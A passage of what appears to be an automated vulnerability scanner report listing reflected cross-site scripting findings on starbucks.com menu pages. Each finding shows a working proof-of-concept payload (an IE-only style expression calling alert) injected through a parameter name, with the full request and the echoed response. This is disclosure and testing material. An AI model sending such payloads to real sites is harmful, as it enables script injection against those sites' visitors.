p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake?177c2"style="x:expression(alert(1))"a4806e71177=1"/>
...[SNIP]...

2.250. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/zucchini-walnut-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1b5d"style="x:expression(alert(1))"335d173fd30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/zucchini-walnut-muffin?b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:53 GMT
Connection: close
Content-Length: 43532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin?b1b5d"style="x:expression(alert(1))"335d173fd30=1"/>
...[SNIP]...

2.251. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed0f5"style="x:expression(alert(1))"926577702c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:01 GMT
Connection: close
Content-Length: 41980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style="x:expression(alert(1))"926577702c9=1"/>
...[SNIP]...

2.252. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc8c9"style="x:expression(alert(1))"dbeae4face2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:47 GMT
Connection: close
Content-Length: 41397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style="x:expression(alert(1))"dbeae4face2=1"/>
...[SNIP]...

2.253. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/protein-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b24"style%3d"x%3aexpression(alert(1))"e4919033202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7b24"style="x:expression(alert(1))"e4919033202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/protein-plate?c7b24"style%3d"x%3aexpression(alert(1))"e4919033202=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:00 GMT
Connection: close
Content-Length: 42074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate?c7b24"style="x:expression(alert(1))"e4919033202=1"/>
...[SNIP]...

2.254. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 576ec"style="x:expression(alert(1))"20b9b21506b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style="x:expression(alert(1))"20b9b21506b=1"/>
...[SNIP]...

2.255. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0a4"style="x:expression(alert(1))"0ec2a3fedc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:52 GMT
Connection: close
Content-Length: 43047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style="x:expression(alert(1))"0ec2a3fedc3=1"/>
...[SNIP]...

2.256. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-brown-sugar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9dc0"style="x:expression(alert(1))"2675c27b610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:15 GMT
Connection: close
Content-Length: 41085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style="x:expression(alert(1))"2675c27b610=1"/>
...[SNIP]...

2.257. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-dried-fruit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5905"style="x:expression(alert(1))"78a9793c5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:09 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style="x:expression(alert(1))"78a9793c5f2=1"/>
...[SNIP]...

2.258. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-mixed-nuts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa5a1"style="x:expression(alert(1))"e5e65ed367b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:12 GMT
Connection: close
Content-Length: 41158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style="x:expression(alert(1))"e5e65ed367b=1"/>
...[SNIP]...

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3953"style="x:expression(alert(1))"8dd8c6a876f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style="x:expression(alert(1))"8dd8c6a876f=1"/>
...[SNIP]...

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71082"style="x:expression(alert(1))"22e1f1319e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:18 GMT
Connection: close
Content-Length: 42422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style="x:expression(alert(1))"22e1f1319e2=1"/>
...[SNIP]...

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099b"style="x:expression(alert(1))"fe560f2ff1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:18 GMT
Connection: close
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style="x:expression(alert(1))"fe560f2ff1f=1"/>
...[SNIP]...

2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a962"style%3d"x%3aexpression(alert(1))"b0910c44384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a962"style="x:expression(alert(1))"b0910c44384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style%3d"x%3aexpression(alert(1))"b0910c44384=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:52 GMT
Connection: close
Content-Length: 42550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style="x:expression(alert(1))"b0910c44384=1"/>
...[SNIP]...

2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df808"style%3d"x%3aexpression(alert(1))"d48af3670c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df808"style="x:expression(alert(1))"d48af3670c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

